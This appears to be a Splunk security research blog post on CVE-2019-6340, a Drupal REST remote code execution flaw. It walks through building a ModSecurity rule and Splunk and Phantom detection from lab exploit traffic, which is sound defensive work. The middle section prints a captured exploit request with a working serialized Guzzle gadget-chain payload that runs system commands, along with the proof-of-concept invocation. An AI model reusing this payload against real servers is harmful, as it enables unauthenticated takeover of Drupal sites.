Every time there is a new vulnerability or exploit in the wild, it presents a complex puzzle for security professionals to solve. It's up to security researchers to lead the effort by providing information on proof-of-concept (POC) code, replication, detection and mitigation phases. Their mission is simple: to help companies and individuals protect themselves against newly released exploit code.
To that end, let's explore the lifecycle and exploit code related to newly revealed vulnerabilities in Drupal, the popular content-management distribution framework. This vulnerability has been detailed in CVE-2019-6340. It affects the versions Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. It allows attackers to execute code on the target without previous authentication, sending data to a non form destination (REST/web service).
Drupal rivals Wordpress in popularity, powering an estimated two percent or more of all websites on the Internet. As mentioned above, there are specific versions of Drupal affected by this vulnerability and explicit conditions that apply. “The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7.” *
The exploit code is found in public repositories. It requires little skill to execute, making it a serious threat to exposed Drupal servers.
Payload code: *
The exploit checks for a content node (/node/{id}) and _format=hal_json via GET request. Next, it sends a payload (Guzzle gadgets), an exploitation technique that targets the PHP unserialize() function. If untrusted data is passed via the unserialize function, it can result in code execution. A very detailed exploitation walkthrough can be found here.
Exploit proof of concept against lab target
Once the exploit was validated, the race was on to create detection and mitigation mechanisms. In this case, since it was a web exploit, we pursued building a ModSec WAF rule as the detection and defense mechanisms to mitigate the threat. The process we followed to produce a ModSec rule appears below:
Using the POC exploit, we captured a pcap of the exploit flow and extracted an example payload using the following tcpdump string:
tcpdump -r CVE-2019-6340.pcap -nn -s0 -A | egrep -e 'GET /node/\d' -A12 -B12
We were able to capture the following example payload that we had used to start building a ModSec Rule:
GET /node/3?_format=hal_json HTTP/1.1
Host: 192.168.86.76
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/hal+json
Content-Length: 583
20:18:28.762332 IP 192.168.86.77.37584 > 192.168.86.76.80: Flags [P.], seq 225:808, ack 1, win 229, options [nop,nop,TS val 615012830 ecr 1128184318], length 583: HTTP
E..{ev@.@.....VM..VL...PO.. ..rB....N>.....
$.Y.C>..{"link": [{"value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:18:\"echo ---- & whoami\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"}], "_links": {"type": {"href": "http://192.168.86.76/rest/type/shortcut/default"}}}
For the payload above, we decided to create a rule that matches on the URL node/3?_format=hal_json and when a request body contains GuzzleHttp\\HandlerStack, both of which are key components of exploiting this vulnerability.
Our first rule draft looked like the following:
We can deconstruct it into the following pieces:
1 |
We configure the SecRule to operate on the REQUEST_URI field and do a regex match (@rx) on the incoming URLs. |
SecRule REQUEST_URI “@rx ^/node/\d+\?_format=hal_json |
2 |
Configure a rule id (id: 932200), including what processing phase this rule will operate in (phase: 2) and what action it should take (block, deny). |
"id:932220,\ |
3 |
Set the logging msg, specify the logdata it should include, and insert a handful of tags. |
sg:'CVE-2019-6340 Drupal Restful module RCE',\ tag:'OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION',\ tag:'WASCTC/WASC-31',\ tag:'OWASP_TOP_10/A1',\ severity:'CRITICAL',\ |
4 |
Chain the first condition with a second SecRule condition that looks for GuzzleHttp\\HandlerStack on REQUEST_BODY, then set a handful of other variables. |
chain" setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/RCE-%{MATCHED_VAR_NAME}=%{tx.0}',\ setvar:'tx.msg=%{rule.msg}'" |
We wrote this rule under /etc/nginx/modsec/main.conf, reloaded NGINX and proceeded to test it with a proof-of-concept exploit by running:
python3 46459.py http://127.0.0.1/ system id
To speed up our initial testing and bypass some of the checks, we modified the exploit a bit.
We configured it to launch the exploit, regardless of whether or not Drupal Cache is enabled (which makes the attack unreliable), and to print the response from the server. This way, we can clearly verify whether NGINX+ModSec is sending us a 403 when the rule matches or, otherwise, returning a 200. Here is our modified version.
After confirming the rule was successfully detecting the attack, we created a pull request and have included it in the OWASP Community Rule Set.
Because Drupal is used so extensively, and because the exploit can transform compromised servers into zombies of botnets that can be used in further attacks (such as DDoS, ransomware, cryptomining, and so on), this exploit could wreak havoc on a global scale. So, it's critical to cover all of our bases.
The following explains how we set up Splunk to detect this threat and demonstrates the process we followed in creating our input configuration. Specifically, we are targeting two log sources. One lets you ingest log events from the ModSec WAF logs. The other is network data, which we target using the Splunk Stream app. Both of these sources require a universal forwarder configuration at the web/proxy server processing web traffic for the targeted application.
1. Add inputs after installing forwarder
This created a props.conf file, as well. The objective of this file is to streamline source log parsing and speed up the indexing as we ingest data from the universal forwarder. In this case, the JSON format was specified.
2. Create props.conf to parse timestamp
Once the above two configuration files were in place, we confirmed the log ingestion and indexing.
You can look at this process through the lens of an analyst's incident workflow: detection, investigation, and response.
As seen below, the search parameters return the parsed logs from ModSec. The exploit payload content can be seen under the “match” field. We can now search for and detect this attack using Splunk core.
3. See raw logs in search head
Once this data is indexed, the analyst can perform multiple investigative actions, such as a timeline analysis of attack requests, a comparison between monitored hosts, or attack-related actions (pre- and post-exploitation). The analyst can subsequently set up alerts based on attack data.
Splunk has a feature that lets you look at the different layers of network traffic using the Splunk Stream App. You can use this to look at patterns while detecting attack data. So, we installed Splunk Stream at the server hosting the targeted application. Next, we verified the ingestion of data in the form of HTTP requests, as seen below.
Splunk Stream App - HTTP Overview
We also tested the ingestion stream by triggering the attack and comparing the HTTP requests' status code, specifically, HTTP Status 403 (forbidden), which is one of the indicators triggered by the rule.
1. Configure stream to collect additional fields (specifically src_content)
Additionally, since we were looking at content payload (Guzzle Gadgets), we decided to configure Splunk Stream app to grab such content by creating a new Metadata Stream for HTTP data`. Enable the stream to capture additional fields specifically the src_content field like in the image below. This is a required step that allows us to search for HTTP content captured in wired data .
Splunk Stream Configuration
Once the new content has been enabled for ingestion, we were able to clearly identify the attack payload, as seen below.
2. search for the payload in src_content
Now that we are able to ingest and index the exploit content payload, we can use a simple generic search to detect this attack, as seen below.
We can go beyond mere detection with Splunk Phantom, an automation tool that allows security operators to perform sequences of mitigation actions based on the results of their detection searches. In the following example, we sent an alert to a Phantom instance via Splunk, and then built a playbook that automates blacklisting of attacking IPs. In the following example, if the IP was an AWS instance, it would be quarantined.
Example of Splunk search and alert to Phantom instance
index="INDEX.NAME" transaction "transaction.messages{}.details.ruleId"=932220 | eval transaction.client_ip="offending.IP" | table transaction.host_ip,transaction.host_port, transaction.client_ip, transaction.messages{}.message | head 1 | sendalert sendtophantom param.phantom_server="automation (https://phantom.instance)" param.sensitivity="amber" param.severity="high" param.label="events" |
Following the alert receipt, Splunk Phantom can automate an actions workflow, as seen below.
Splunk Phantom Playbook
The following items are the components of the above Phantom playbook:
Depending on the situation, you could initiate multiple actions. The following is an example of the actions available in one of the highlighted applications in the workflow we have described. This AWS Phantom app can perform multiple actions, including blacklisting, quarantining, disabling access, removing access, etc.
Splunk Phantom AWS Playbook
General mitigations for this vulnerability/attack:
Download the bits on Github, and get the Splunk Enterprise Security Content Updates (ESCU) app in Splunkbase.
The Splunk Security Research Team is devoted to delivering actionable intelligence to Splunk customers, in an unceasing effort to safeguard them against modern enterprise risks. Composed of elite researchers, engineers, and consultants who have served in both public- and private-sector organizations, this innovative team of digital defenders monitors emerging cybercrime trends and techniques, then translates them into practical analytics that Splunk users can operationalize within their environments. Download the Splunk Enterprise Security Content Updates app to learn more.
The Splunk platform removes the barriers between data and action, empowering observability, IT and security teams to ensure their organizations are secure, resilient and innovative.
Founded in 2003, Splunk is a global company — with over 7,500 employees, Splunkers have received over 1,020 patents to date and availability in 21 regions around the world — and offers an open, extensible data platform that supports shared data across any environment so that all teams in an organization can get end-to-end visibility, with context, for every interaction and business process. Build a strong data foundation with Splunk.